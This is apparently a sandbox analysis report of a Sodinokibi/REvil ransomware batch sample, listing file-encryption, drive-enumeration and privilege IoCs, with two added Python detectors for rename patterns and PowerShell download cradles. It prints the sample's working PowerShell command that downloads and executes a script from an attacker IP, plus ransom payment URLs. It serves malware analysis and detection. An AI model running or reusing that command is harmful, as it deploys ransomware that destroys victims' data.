Analysis
-
max time kernel
35s
-
max time network
43s
-
platform
windows10_x64
-
resource
win10v20201028
-
submitted
03-11-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win7v20201028
Behavioral task
behavioral2
Sample
af1dcc03472a3760e7f068ff48725448.bat
Resource
win10v20201028
General
-
Target
af1dcc03472a3760e7f068ff48725448.bat
-
Size
214B
-
MD5
5cef3f9a231d5cf5d5fbd670d721dccd
-
SHA1
baf5a46fcbe4fae2a70e5d22449ff4ed03a93e33
-
SHA256
f14eb9a5eaf915aa1fb082741ab3c1d275e0dfed65d67b6dabc2cc7b0d01923f
-
SHA512
d51a3c23cd1e5a3b079f76697fd46e4ba37fe3890d8ae29c5106d364d86e2f662fee98483c1c6febaf5087a8c3f4b5b11aff9ff633fd263b939ab416442fda02
Malware Config
Extracted
http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448
Extracted
C:\be6o1iixm-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FA59E30A8F9FC69
http://decryptor.cc/7FA59E30A8F9FC69
Signatures
-
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoC
Processes:
flow | pid | process
10 | 2792 | powershell.exe
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File opened for modification | \??\c:\users\admin\pictures\RedoSwitch.tiff | powershell.exe
File renamed | C:\Users\Admin\Pictures\ConvertFromBlock.tiff => \??\c:\users\admin\pictures\ConvertFromBlock.tiff.be6o1iixm | powershell.exe
File renamed | C:\Users\Admin\Pictures\FormatPing.tiff => \??\c:\users\admin\pictures\FormatPing.tiff.be6o1iixm | powershell.exe
File renamed | C:\Users\Admin\Pictures\MeasureMerge.crw => \??\c:\users\admin\pictures\MeasureMerge.crw.be6o1iixm | powershell.exe
File renamed | C:\Users\Admin\Pictures\RedoSwitch.tiff => \??\c:\users\admin\pictures\RedoSwitch.tiff.be6o1iixm | powershell.exe
File renamed | C:\Users\Admin\Pictures\WaitUninstall.tif => \??\c:\users\admin\pictures\WaitUninstall.tif.be6o1iixm | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\ConvertFromBlock.tiff | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\FormatPing.tiff | powershell.exe
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\S: | powershell.exe
File opened (read-only) | \??\T: | powershell.exe
File opened (read-only) | \??\V: | powershell.exe
File opened (read-only) | \??\W: | powershell.exe
File opened (read-only) | \??\E: | powershell.exe
File opened (read-only) | \??\F: | powershell.exe
File opened (read-only) | \??\H: | powershell.exe
File opened (read-only) | \??\P: | powershell.exe
File opened (read-only) | \??\U: | powershell.exe
File opened (read-only) | \??\Z: | powershell.exe
File opened (read-only) | \??\B: | powershell.exe
File opened (read-only) | \??\I: | powershell.exe
File opened (read-only) | \??\O: | powershell.exe
File opened (read-only) | \??\R: | powershell.exe
File opened (read-only) | \??\X: | powershell.exe
File opened (read-only) | \??\G: | powershell.exe
File opened (read-only) | \??\J: | powershell.exe
File opened (read-only) | \??\K: | powershell.exe
File opened (read-only) | \??\Q: | powershell.exe
File opened (read-only) | \??\Y: | powershell.exe
File opened (read-only) | \??\D: | powershell.exe
File opened (read-only) | \??\A: | powershell.exe
File opened (read-only) | \??\L: | powershell.exe
File opened (read-only) | \??\M: | powershell.exe
File opened (read-only) | \??\N: | powershell.exe
Modifies service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoC
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\349.bmp" | powershell.exe
Drops file in Program Files directory 25 IoCs
Processes:
description | ioc | process
File opened for modification | \??\c:\program files\ResetDisconnect.rmi | powershell.exe
File opened for modification | \??\c:\program files\ResetInstall.mht | powershell.exe
File opened for modification | \??\c:\program files\SavePop.mpv2 | powershell.exe
File opened for modification | \??\c:\program files\AddSet.reg | powershell.exe
File opened for modification | \??\c:\program files\CompressStep.pptm | powershell.exe
File opened for modification | \??\c:\program files\EnterRepair.wmv | powershell.exe
File opened for modification | \??\c:\program files\PushCompare.mht | powershell.exe
File opened for modification | \??\c:\program files\ProtectBlock.WTV | powershell.exe
File opened for modification | \??\c:\program files\SkipStep.tif | powershell.exe
File opened for modification | \??\c:\program files\UpdateFormat.html | powershell.exe
File opened for modification | \??\c:\program files\RegisterReceive.m1v | powershell.exe
File opened for modification | \??\c:\program files\RepairConvert.mp2v | powershell.exe
File opened for modification | \??\c:\program files\UnprotectRestore.mid | powershell.exe
File created | \??\c:\program files (x86)\be6o1iixm-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\CompressUnregister.au | powershell.exe
File opened for modification | \??\c:\program files\ConnectUnregister.wmv | powershell.exe
File opened for modification | \??\c:\program files\PingDismount.vsw | powershell.exe
File opened for modification | \??\c:\program files\DenyStop.rtf | powershell.exe
File opened for modification | \??\c:\program files\OutEdit.MTS | powershell.exe
File opened for modification | \??\c:\program files\UpdateUninstall.mp4 | powershell.exe
File opened for modification | \??\c:\program files\WriteGet.svgz | powershell.exe
File created | \??\c:\program files\be6o1iixm-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ApproveAssert.gif | powershell.exe
File opened for modification | \??\c:\program files\CompleteRename.easmx | powershell.exe
File opened for modification | \??\c:\program files\ConvertToOpen.mht | powershell.exe
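The "Modifies extensions of user files", "Enumerates connected drives" and "Drops file in Program Files directory" sections above are the three file-side IoC groups this family leaves behind: every rename appends the same random suffix (here `.be6o1iixm`), a ransom note named `<suffix>-readme.txt` is created in each directory it touches, and every drive root is probed read-only before encryption. The script below is an added example, not part of the report or of any vendor tooling; it infers that suffix from raw file events, pairs it with the matching note files and drive probes, and ignores a benign single-rename pattern for contrast. The `EVENTS` list is constructed from the IoCs listed above (plus one constructed benign rename by a hypothetical PID 1500), and the field names `op`, `pid`, `path`, `new_path` are an assumption rather than any sandbox's schema.

```python
"""Infer the appended extension, ransom note and drive probing from file events.

Added example, not part of the sandbox report. EVENTS is constructed from the
IoCs the report lists for PID 2792 plus one benign rename; the field names
("op", "pid", "path", "new_path") are an assumption, not a vendor schema.
"""
import re
from collections import Counter

NT_PREFIX = "\\??\\"  # NT object-manager prefix on the report's \??\c:\... paths
DRIVE_ROOT = re.compile(r"[a-z]:")


def norm(path):
    """Strip the \\??\\ prefix and lower-case so NT and Win32 forms compare equal."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return path.lower()


def appended_suffix(old, new):
    """Return the suffix when `new` is exactly `old` + '.' + suffix, else None."""
    o, n = norm(old), norm(new)
    if not n.startswith(o + "."):
        return None
    suffix = n[len(o) + 1:]
    if not suffix or "\\" in suffix or "/" in suffix:
        return None
    return suffix


def triage(events, min_renames=3):
    """Count appended-suffix renames per (pid, suffix). A suffix seen at least
    min_renames times is reported together with ransom notes named
    <suffix>-readme.txt (the naming seen in this report) and the drive roots
    the same PID opened read-only."""
    per_pid = Counter()
    for ev in events:
        if ev["op"] == "rename":
            s = appended_suffix(ev["path"], ev["new_path"])
            if s:
                per_pid[(ev["pid"], s)] += 1
    findings = []
    for (pid, suffix), n in per_pid.items():
        if n < min_renames:
            continue
        notes = sorted(
            norm(ev["path"]) for ev in events
            if ev["op"] == "create" and ev["pid"] == pid
            and norm(ev["path"]).endswith(f"{suffix}-readme.txt"))
        drives = sorted({
            norm(ev["path"])[0].upper() for ev in events
            if ev["op"] == "open_ro" and ev["pid"] == pid
            and DRIVE_ROOT.fullmatch(norm(ev["path"]))})
        findings.append({"pid": pid, "suffix": suffix, "renamed": n,
                         "ransom_notes": notes, "drives_probed": drives})
    return findings


def _rename(pid, old, new):
    return {"op": "rename", "pid": pid, "path": old, "new_path": new}


PICS = "C:\\Users\\Admin\\Pictures\\"
NTPICS = "\\??\\c:\\users\\admin\\pictures\\"
# Constructed from the report's IoCs; the last entry is a constructed benign rename.
EVENTS = [
    _rename(2792, PICS + "ConvertFromBlock.tiff", NTPICS + "ConvertFromBlock.tiff.be6o1iixm"),
    _rename(2792, PICS + "FormatPing.tiff", NTPICS + "FormatPing.tiff.be6o1iixm"),
    _rename(2792, PICS + "MeasureMerge.crw", NTPICS + "MeasureMerge.crw.be6o1iixm"),
    _rename(2792, PICS + "RedoSwitch.tiff", NTPICS + "RedoSwitch.tiff.be6o1iixm"),
    _rename(2792, PICS + "WaitUninstall.tif", NTPICS + "WaitUninstall.tif.be6o1iixm"),
    {"op": "create", "pid": 2792, "path": "\\??\\c:\\program files\\be6o1iixm-readme.txt"},
    {"op": "create", "pid": 2792, "path": "\\??\\c:\\program files (x86)\\be6o1iixm-readme.txt"},
    {"op": "open_ro", "pid": 2792, "path": "\\??\\S:"},
    {"op": "open_ro", "pid": 2792, "path": "\\??\\E:"},
    {"op": "open_ro", "pid": 2792, "path": "\\??\\D:"},
    _rename(1500, "C:\\Users\\Admin\\Documents\\notes.docx",
            "C:\\Users\\Admin\\Documents\\notes.docx.bak"),
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The threshold matters: a single `name.ext => name.ext.bak` rename is what editors and backup tools do, so the verdict rests on many renames sharing one suffix from one PID, and the note-file and drive-probe evidence is attached to that PID rather than used on its own. Running it on this report's events yields one finding for PID 2792 with suffix `be6o1iixm`, both ransom notes and the probed drive letters.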
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid | process
2792 | powershell.exe
2792 | powershell.exe
2792 | powershell.exe
2792 | powershell.exe
2792 | powershell.exe
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2792 | powershell.exe
Token: SeDebugPrivilege | 2792 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2792 | powershell.exe
Token: SeBackupPrivilege | 2088 | vssvc.exe
Token: SeRestorePrivilege | 2088 | vssvc.exe
Token: SeAuditPrivilege | 2088 | vssvc.exe
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
description | pid | process | target process
PID 428 wrote to memory of 2792 | 428 | cmd.exe | powershell.exe
PID 428 wrote to memory of 2792 | 428 | cmd.exe | powershell.exe
PID 428 wrote to memory of 2792 | 428 | cmd.exe | powershell.exe
Processes
-
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\af1dcc03472a3760e7f068ff48725448.bat"
  - Suspicious use of WriteProcessMemory
  PID: 428
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of PID 428)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448');Invoke-KSBCZTZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2792
- C:\Windows\system32\vssvc.exe (depth 1)
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 2088
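The process tree is the whole story of the first stage: a 214-byte .bat launches the 32-bit PowerShell (`SysWOW64` on a 64-bit host), which fetches a script from `http://185.103.242.78/...` with `DownloadString`, executes it in memory with `IEX`, calls the function it defined (`Invoke-KSBCZTZ`), and then parks itself in `Start-Sleep -s 10000` so the in-memory payload keeps running while every later file, registry and drive IoC is attributed to that same PID 2792. Nothing touches disk except the .bat and the ransomware's own output, so the process-creation record is the earliest point to catch it. The detector below is an added example, not part of the report or of any vendor tooling; it generalises the exact string above to the common `IEX`/`Invoke-Expression` plus `DownloadString`/`Invoke-WebRequest` cradle forms, extracts the URL and host for blocking, and records the WOW64 and long-sleep details as corroboration. The `EVENTS` list is constructed to mirror the tree above (plus one constructed benign PowerShell launch), and the Sysmon-style field names are an assumption.

```python
"""Flag a PowerShell download cradle in process-creation events.

Added example, not part of the sandbox report. EVENTS is constructed (Sysmon
event 1 style; the field names are an assumption) to mirror the report's tree:
PID 428 cmd.exe running the .bat, PID 2792 PowerShell fetching and executing a
remote script in memory, plus one benign PowerShell launch for contrast.
"""
import re
from urllib.parse import urlparse

# An in-memory execution primitive and a fetch primitive in the same command line.
EXEC_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
FETCH_RE = re.compile(
    r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
SLEEP_RE = re.compile(r"Start-Sleep\s+-s(?:econds)?\s+(\d+)", re.IGNORECASE)


def analyze_event(ev):
    """Return a finding dict when `ev` is a PowerShell download cradle, else None."""
    image = ev["image"].lower()
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return None
    cmd = ev["cmdline"]
    if not (EXEC_RE.search(cmd) and FETCH_RE.search(cmd)):
        return None
    urls = URL_RE.findall(cmd)
    sleep = SLEEP_RE.search(cmd)
    return {
        "pid": ev["pid"],
        "parent": ev["parent_image"].rsplit("\\", 1)[-1].lower(),
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "wow64": "\\syswow64\\" in image,  # 32-bit PowerShell on a 64-bit host
        "sleep_seconds": int(sleep.group(1)) if sleep else 0,
    }


def analyze(events):
    """Run analyze_event over every event and keep the hits."""
    return [f for f in map(analyze_event, events) if f]


# Constructed sample events modelled on the report's process tree.
EVENTS = [
    {
        "pid": 428, "ppid": 1200,
        "image": r"C:\Windows\system32\cmd.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\af1dcc03472a3760e7f068ff48725448.bat"',
    },
    {
        "pid": 2792, "ppid": 428,
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\system32\cmd.exe",
        "cmdline": (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                    '"IEX (New-Object System.Net.WebClient).DownloadString('
                    "'http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448');"
                    'Invoke-KSBCZTZ;Start-Sleep -s 10000"'),
    },
    {   # constructed benign admin use, same image family, no cradle
        "pid": 3100, "ppid": 900,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1",
    },
]

if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

On these events it returns exactly one finding: PID 2792, parent `cmd.exe`, host `185.103.242.78`, WOW64 true, sleep 10000 s. The match is on the plain command line, so a `-EncodedCommand` or string-obfuscated variant of the same cradle would slip past it; in production pair this with PowerShell script block logging (Event ID 4104), which records the script after decoding, and treat the extracted host as a block-list candidate rather than a verdict on its own.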
Network
MITRE ATT&CK Enterprise v6
Downloads
-
memory/2792-0-0x0000000000000000-mapping.dmp
-
memory/2792-1-0x00000000731E0000-0x00000000738CE000-memory.dmp
Filesize: 6.9MB
-
memory/2792-2-0x0000000004C90000-0x0000000004C91000-memory.dmp
Filesize: 4KB
-
memory/2792-3-0x0000000007860000-0x0000000007861000-memory.dmp
Filesize: 4KB
-
memory/2792-4-0x0000000007600000-0x0000000007601000-memory.dmp
Filesize: 4KB
-
memory/2792-5-0x00000000077A0000-0x00000000077A1000-memory.dmp
Filesize: 4KB
-
memory/2792-6-0x0000000007F70000-0x0000000007F71000-memory.dmp
Filesize: 4KB
-
memory/2792-7-0x00000000080E0000-0x00000000080E1000-memory.dmp
Filesize: 4KB
-
memory/2792-8-0x0000000007F40000-0x0000000007F41000-memory.dmp
Filesize: 4KB
-
memory/2792-9-0x00000000089A0000-0x00000000089A1000-memory.dmp
Filesize: 4KB
-
memory/2792-10-0x00000000087E0000-0x00000000087E1000-memory.dmp
Filesize: 4KB
-
memory/2792-11-0x0000000009FA0000-0x0000000009FA1000-memory.dmp
Filesize: 4KB
-
memory/2792-12-0x0000000009540000-0x0000000009541000-memory.dmp
Filesize: 4KB